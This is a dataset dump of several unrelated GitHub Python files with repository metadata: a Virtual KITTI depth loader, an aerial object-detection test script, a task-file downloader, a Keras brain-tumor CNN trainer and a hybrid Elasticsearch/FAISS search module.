notes = get_notes(text_file_absolute_path)
print(notes)
analysis_file_absolute_path = get_absolute_path_for_file(text_file, analysis_folder_path, 'txt')
generate_file_a(notes, analysis_file_absolute_path)
| dpjn316gh/midi-analysis | midi_analysis.py | midi_analysis.py | py | 3,181 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "re.search",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "re.search",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "re.search",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "re.search",
"line_number": 32,
... |
23196803682 | import os
from pkgutil import extend_path
import numpy as np
import PIL.Image as pil
import torch
import json
from .mono_dataset import MonoDataset
class Virtual_Kitti(MonoDataset):
def __init__(self, *args, **kwargs):
super(Virtual_Kitti, self).__init__(*args, **kwargs)
self.K = np.array([[0.58, 0, 0.5, 0],
[0, 1.92, 0.5, 0],
[0, 0, 1, 0],
[0, 0, 0, 1]], dtype=np.float32)
self.full_res_shape = (1242, 375)
self.rgb_head = 'rgb_'
self.depth_head = 'depth_'
self.depth_img_ext ='.png'
def check_depth(self):
return True
def get_color(self, folder, frame_index, side, do_flip=False):
color = self.loader(os.path.join(self.data_path, 'rgb', folder, 'frames/rgb/Camera_0',
(self.rgb_head + str(frame_index).zfill(5) + self.img_ext)))
if do_flip:
color = color.transpose(pil.FLIP_LEFT_RIGHT)
return color
def get_depth(self, folder, frame_index, side, do_flip=False):
depth_path = os.path.join(self.data_path, 'depth', folder, 'frames/depth/Camera_0',
(self.depth_head + str(frame_index).zfill(5) + self.depth_img_ext))
depth_gt = pil.open(depth_path)
depth_gt = np.array(depth_gt).astype(np.float32) * 80.0 / 65535.0
if do_flip:
depth_gt = np.fliplr(depth_gt)
return depth_gt | KU-CVLAB/MaskingDepth | datasets/virtual_kitti_dataset.py | virtual_kitti_dataset.py | py | 1,516 | python | en | code | 34 | github-code | 1 | [
{
"api_name": "mono_dataset.MonoDataset",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "numpy.array",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "numpy.float32",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "os.path.join"... |
2673782167 | import os.path
import sys
import threading
import time
import numpy as np
import torch
import yaml
import customDataset as dataset
import torchvision.transforms as tv
from torch.utils.data import DataLoader
import utils
import pandas as pd
import matplotlib.pyplot as plt
from model import NetworkModel
img_test_path: str
csv_test_path: str
dim: int
no_of_classes: int
weights: dict
obj_in_grid: int
one_dataset_image: bool
one_random_image: bool
draw_ground_truth: bool
image_path: str
labels: dict
def init():
with open('configs/model-config.yaml') as f:
configs = yaml.safe_load(f)
testing_cfg = configs['testing']
general_cfg = configs['general']
global img_test_path
img_test_path = testing_cfg['testing_img']
global csv_test_path
csv_test_path = testing_cfg['testing_csv']
global dim
dim = general_cfg['img_dim']
global no_of_classes
no_of_classes = general_cfg['no_of_classes']
global weights
weights = torch.load(testing_cfg['weights'])
global obj_in_grid
obj_in_grid = general_cfg['objects_in_grid']
global one_dataset_image
one_dataset_image = testing_cfg['oneDatasetImage']
global one_random_image
one_random_image = testing_cfg['oneRandomImage']
if one_dataset_image or one_random_image:
global image_path
image_path = testing_cfg['image']
global draw_ground_truth
draw_ground_truth = testing_cfg['draw_ground_truth']
with open('configs/pre-processing-config.yaml') as f:
preproc_config = yaml.safe_load(f)
global labels
labels = preproc_config['processImages']['labels']
def test_img_section(key, d):
d[key] = np.float16(d[key])
d[key] = utils.image_checks(d[key], dim, dim)
d[key], annotations = utils.torch_prepare(d[key], np.zeros((1, 5)))
with torch.no_grad():
outputs = network(cropped[key])
final_pred = utils.FinalPredictions(outputs.cpu(), annotations)
full_scale_pred.add_prediction(key, final_pred)
if __name__ == "__main__":
init()
# Loading saved model
network = NetworkModel(no_of_classes, obj_in_grid, testing=True)
try:
network.load_state_dict(weights)
except RuntimeError:
print('Weights from file don\'t match model\'s weights shape, please check number of classes'
' and number of objects to be detected in a grid cell')
print('exiting...')
time.sleep(2)
sys.exit(-1)
network.eval()
network.cuda()
if one_dataset_image:
print('Testing one image from DOTA dataset')
annotations = pd.read_csv(os.path.join(csv_test_path, image_path + '.csv'), header=None)
annotations = np.array(annotations)
image = plt.imread(os.path.join(img_test_path, image_path + '.png'))
image = image.astype(np.float16)
image = utils.image_checks(image, dim, dim)
image, annotations = utils.torch_prepare(image, annotations)
with torch.no_grad():
start = time.time_ns()
outputs = network(image)
end = time.time_ns()
inference_time = (end - start) * (10**(-6))
print(f'Inference time: {inference_time}')
print('Detected objects: ')
plt.figure()
final_pred = utils.FinalPredictions(outputs.cpu(), annotations)
annt_test = utils.FinalPredictions(annotations, annotations)
image = plt.imread(os.path.join(img_test_path, image_path + '.png'))
final_pred.draw_boxes()
if draw_ground_truth:
annt_test.draw_boxes(truths=True)
plt.imshow(image)
plt.show(block=True)
elif one_random_image:
print('Testing one random image')
cropped = utils.crop_img(image_path, dim)
full_scale_pred = utils.FullScalePrediction()
threads = []
for key in cropped:
thread = threading.Thread(target=test_img_section, args=(key, cropped))
threads.append(thread)
[t.start() for t in threads]
[t.join() for t in threads]
plt.figure()
img = plt.imread(image_path)
full_scale_pred.to_full_scale()
full_scale_pred.draw()
plt.imshow(img)
plt.show(block=True)
else:
print('Loading the testing dataset...')
transform = tv.Compose([tv.ToTensor()])
testing_dataset = dataset.AerialImagesDataset(
csv_test_path, img_test_path, dim, no_of_classes, obj_in_grid, transform=transform)
print('Dataset ready')
print('Loading the testing dataloader...')
test_loader = DataLoader(dataset=testing_dataset, batch_size=1, shuffle=False, num_workers=1)
print('Testing dataloader ready')
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
durations = []
for i, (image, annotations) in enumerate(test_loader):
image = image.to(device)
annotations = annotations.reshape(-1, 49 * (5 + no_of_classes))
with torch.no_grad():
start = time.time_ns()
outputs = network(image)
end = time.time_ns()
duration_ms = (end-start) * (10**(-6))
durations.append(duration_ms)
final_pred = utils.FinalPredictions(outputs.cpu().to(torch.float32), annotations.to(torch.float32))
mAP = utils.get_mAP()
print(f'mAP: {mAP}')
avg_inf_time = np.sum(np.asarray(durations)) / len(durations)
print(f'Average inference time: {avg_inf_time} ms')
true_pos_count = utils.get_TP_count()
all_pos_count = utils.get_P_count()
print(f'Objects detected correctly count: {true_pos_count}'
f'\n All objects in testing set: {all_pos_count} \n'
f'Ratio: {true_pos_count/all_pos_count} \n'
f'Average ratio per image: {utils.get_avg_ratio()}')
| edinitu/ObjectDetection | testing.py | testing.py | py | 5,896 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "yaml.safe_load",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "torch.load",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "yaml.safe_load",
"line_number": 58,
"usage_type": "call"
},
{
"api_name": "numpy.float16",
"line_nu... |
11085514285 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# author: beimingmaster@gmail.com
import os
import time
import json
import requests
from optparse import OptionParser
from common import config
def do_download(task_id):
print('do download work for task id: %s ...' % task_id)
file_url = None
url_json_file = '%s/%s/url.json' % (config.data_path, task_id)
data_json_file = '%s/%s/data.json' % (config.data_path, task_id)
print('url json file: ', url_json_file)
print('data json file: ', data_json_file)
if not os.path.exists(url_json_file):
print('url json file does not exist: ', url_json_file)
return False
elif os.path.exists(data_json_file):
print('data json file does exist: ', data_json_file)
return False
with open(url_json_file, 'r', encoding='utf8') as f:
url_json_data = json.load(f)
if 'file_url' in url_json_data:
file_url = url_json_data['file_url']
print('file url: ', file_url)
if file_url:
try:
r = requests.get(file_url, timeout=10, stream=True, verify=None)
if r.status_code == 200:
with open(data_json_file, 'wb') as f:
#f.write(r.text)
for chunk in r.iter_content(chunk_size=1024*1024):
if chunk:
f.write(chunk)
else:
print('downloading task data has error: %s' % file_url)
except Exception as ex:
print('requests has error', ex)
else:
print('file url is no exists for task_id : %s' % task_id)
return False
if __name__ == '__main__':
parser = OptionParser()
parser.add_option('-t', '--task', type='string', dest='task_id', help='task id to analysis')
(options, args) = parser.parse_args()
print('options: ', options)
print('args: ', args)
task_id = options.task_id
if task_id:
start = time.time()
do_download(task_id)
end = time.time()
print('doing download work takes %.2fs!' % (end-start))
else:
print('task id not provided')
| beimingmaster/jrmanalysis | cmd/download_cmd.py | download_cmd.py | py | 2,132 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "common.config.data_path",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "common.config",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "common.config.data_path",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name"... |
40096865876 | #!/usr/bin/env python
import random
import logging
import datetime
import cPickle
from time import time
class GeneticAlgorithm(object):
"""Runs genetic algorithm, contains chromosomes and applies fitness,
selection, recombination and mutation methods to them."""
def __init__(self,
population_size,
survivors_per_round,
generations,
mutation_rate,
peptide_length,
fitness_function,
selection_function,
recombination_function,
chromosome_type,
chromosome_elements):
self.population_size = population_size
self.survivors_per_round = survivors_per_round
self.generations = generations
self.mutation_rate = mutation_rate
self.chromosome_length = peptide_length
self.current_generation = 0
self.population = None
self.selection_func = selection_function
self.fitness_function = fitness_function
self.recombination_function = recombination_function
self.chromosome_type = chromosome_type
self.elements = chromosome_elements
self.run_record = []
self.do_logging = True
self._init_time = time()
self._setup_ga()
def run(self, do_logging=True):
if do_logging:
self.do_logging = True
logging.info("-----RUNNING-GA-----")
while self.current_generation < self.generations:
self._run_selection_round()
if self.do_logging:
logging.info("-----FINISHED------")
self.log_status()
self.final_summary()
def log_status(self):
ave_fitness = lambda:sum(c.fitness for c in
self.population)/self.population_size
logging.info("\n\n..........")
logging.info("Population size: %d" % self.population_size)
logging.info("Survivors per round: %d" % self.survivors_per_round)
logging.info("Current round %d/%d" % (self.current_generation,
self.generations))
time_elapsed = datetime.timedelta(seconds=round(time()-self._init_time))
logging.info("Time elapsed %s" % str(time_elapsed))
logging.info("Average Fitness %f" % ave_fitness())
logging.info("..........\n\n")
@classmethod
def load_run(cls, f):
with open(f) as data:
return cPickle.load(data)
def save(self):
pickle_fname = "round%d.pkl" % self.current_generation
with open(pickle_fname, 'wb') as f:
cPickle.dump(self, f)
def _setup_ga(self):
assert self.survivors_per_round >= 2
assert self.survivors_per_round < self.population_size
assert 0.0 < self.mutation_rate < 1.0
if self.do_logging:
logging.info("\n\n\n-----BEGINNING-GA-RUN-----")
logging.info("-----CALCULATING-INITIAL-GA-FITNESSES-----")
self._random_initial_population()
def _random_initial_population(self):
random_chromosome = self.chromosome_type.random_chromosome
self.population = []
while len(self.population) < self.population_size:
new_chromosome = random_chromosome(self.chromosome_length,
self.mutation_rate,
elements=self.elements)
assert new_chromosome, "Failed to construct chromosome"
if new_chromosome not in self.population:
self.population.append(new_chromosome)
self._calc_population_fitness()
initial_statistics = {'initial_population': [(c.idx_name, c.fitness)
for c in self.population]}
self.run_record.append(initial_statistics)
def _calc_population_fitness(self):
fitnesses = self.fitness_function(self.population)
for chromosome, fitness in zip(self.population, fitnesses):
#Fitness function modifies chromosome fitness in place
chromosome.fitness = fitness
def _run_selection_round(self):
round_statistics = {'selected': [], 'children': []}
seqs_as_str = lambda l: ", ".join(c.idx_name for c in l)
if self.do_logging:
self.log_status()
logging.info("-----RUNNING-SELECTION-ROUND-----")
self.current_generation += 1
selected = []
#Select survivors
while len(selected) < self.survivors_per_round:
selected_chromosomes = self.selection_func(self.population)
assert [s in self.population for s in selected_chromosomes]
selected.extend(selected_chromosomes)
#Delete chosen chromosomes from selection pool (i.e. population)
for selected_chromosome in selected_chromosomes:
self.population.remove(selected_chromosome)
if self.do_logging:
logging.info("SELECTED CHROMOSOMES: %s" % seqs_as_str(selected))
round_statistics['selected'] = [(c.idx_name, c.fitness)
for c in selected]
#Recombination of survivors to make children
#Randomly select pairs of parents until there are enough children
children = []
while len(children) < self.population_size:
p1, p2 = _random_choose_two(selected)
new_sequence = self.recombination_function(p1.sequence, p2.sequence)
#Random mutation of children
child = self.chromosome_type(new_sequence, self.mutation_rate,
elements=self.elements)
child.mutate()
#Do not add duplicate sequences
if child.sequence not in [c.sequence for c in children]:
children.append(child)
if self.do_logging:
logging.info("NEXT GENERATION: %s" % seqs_as_str(children))
num_unique_sequences = len(set(c.sequence for c in children))
assert num_unique_sequences == self.population_size
self.population = children
self._calc_population_fitness()
round_statistics['children'] = [(c.idx_name, c.fitness)
for c in self.population]
self.run_record.append(round_statistics)
self.save()
def final_summary(self):
with open('ga-summary.txt', 'w') as out:
line = "Name: %s, Fitness %s"
print>>out, "Initial Population:"
for (name, fitness) in self.run_record[0]['initial_population']:
print>>out, line % (name, fitness)
print>>out, '\n'
for i, ga_round in enumerate(self.run_record[1:]):
print>>out, "Round %d" % (i+1)
for step in ('selected', 'children'):
print>>out, step
for (name, fitness) in ga_round[step]:
print>>out, line % (name, fitness)
print>>out
def _random_choose_two(seq):
a = random.choice(seq)
b = random.choice(seq)
while b is not a:
b = random.choice(seq)
return a, b
| fergaljd/pep_ga | ga.py | ga.py | py | 7,279 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "time.time",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 47,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number":... |
32521441026 | from keras.models import Sequential
from keras.layers import Conv2D, MaxPooling2D, Flatten, Dense
from keras.callbacks import History
import matplotlib.pyplot as plt
from preprocessing import X_train, X_val, y_train, y_val
# Build model
model = Sequential()
model.add(Conv2D(32, (3, 3), activation='relu', input_shape=(64, 64, 3)))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
model.add(Dense(64, activation='relu'))
model.add(Dense(1, activation='sigmoid'))
# Compile model
model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])
# Train model
history = History()
model.fit(X_train, y_train, validation_data=(X_val, y_val), epochs=10, callbacks=[history])
# Plot training & validation accuracy values
plt.plot(history.history['accuracy'])
plt.plot(history.history['val_accuracy'])
plt.title('Model accuracy')
plt.ylabel('Accuracy')
plt.xlabel('Epoch')
plt.legend(['Train', 'Test'], loc='upper left')
plt.savefig('static/accuracy_plot.png') # Save plot as image
plt.show()
plt.close() # Close the figure
# Plot training & validation loss values
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('Model loss')
plt.ylabel('Loss')
plt.xlabel('Epoch')
plt.legend(['Train', 'Test'], loc='upper left')
plt.savefig('static/loss_plot.png') # Save plot as image
plt.show()
plt.close() # Close the figure
# Save model
model.save('brain_tumor_model.h5')
| alfalfs/Cancer_Detection_using_CCN | model.py | model.py | py | 1,521 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "keras.models.Sequential",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "keras.layers.Conv2D",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "keras.layers.MaxPooling2D",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "k... |
18509519039 | import logging
from sentence_transformers import CrossEncoder
from psycopg.rows import class_row
from ssearch.core.db.postgres import db
from ssearch.core.models import SearchResult, DocumentMetadata
from ssearch.core.search.es import search_es
from ssearch.core.search.vector import search_faiss, fetch_chunk_ids
cross_encoder = CrossEncoder('cross-encoder/ms-marco-MiniLM-L-12-v2')
def fetch_document_metadata(ids):
try:
with db.connect() as conn:
cur = conn.cursor(row_factory=class_row(DocumentMetadata))
cur.execute(
"SELECT id, file_name, file_type FROM documents WHERE id = ANY(%s)", [ids])
results = cur.fetchall()
conn.commit()
return results
except Exception as e:
logging.error(f"Error fetching document metadata: {e}")
return []
def rerank(query, results: SearchResult):
pairs = [(query, hit.chunk_text) for hit in results]
scores = cross_encoder.predict(pairs)
for result, score in zip(results, scores):
result.score = score
results.sort(key=lambda x: x.score, reverse=True)
return results
def merge_results(es_results, faiss_results):
# Merge the results from ES and FAISS
# Ensure that the results are unique
results = list(
{result.id: result for result in es_results + faiss_results}.values())
return results
def search_hybrid(query, top_k):
es_results = search_es(query, top_k)
ids = search_faiss(query, top_k)
faiss_results = fetch_chunk_ids(ids)
results = merge_results(es_results, faiss_results)
results = rerank(query, results)
document_ids = [result.document_id for result in results]
document_metadata = fetch_document_metadata(document_ids)
metadata_dict = {metadata.id: metadata for metadata in document_metadata}
for result in results:
result.metadata = metadata_dict[result.document_id]
return results
if __name__ == "__main__":
# Test the search function
query = "What is diffusion?"
top_k = 10
results = search_hybrid(query, top_k)
print(results)
# es_results = search_es(query, top_k)
# print(es_results)
# ids = search_faiss(query, top_k)
# faiss_results = fetch_chunk_ids(ids)
# print(faiss_results)
# results = es_results + faiss_results
# results = rerank(query, results)
# print(results)
| SaeedAnas/Generative-AI | ssearch/core/search/hybrid.py | hybrid.py | py | 2,400 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "sentence_transformers.CrossEncoder",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "ssearch.core.db.postgres.db.connect",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "ssearch.core.db.postgres.db",
"line_number": 16,
"usage_type": "na... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.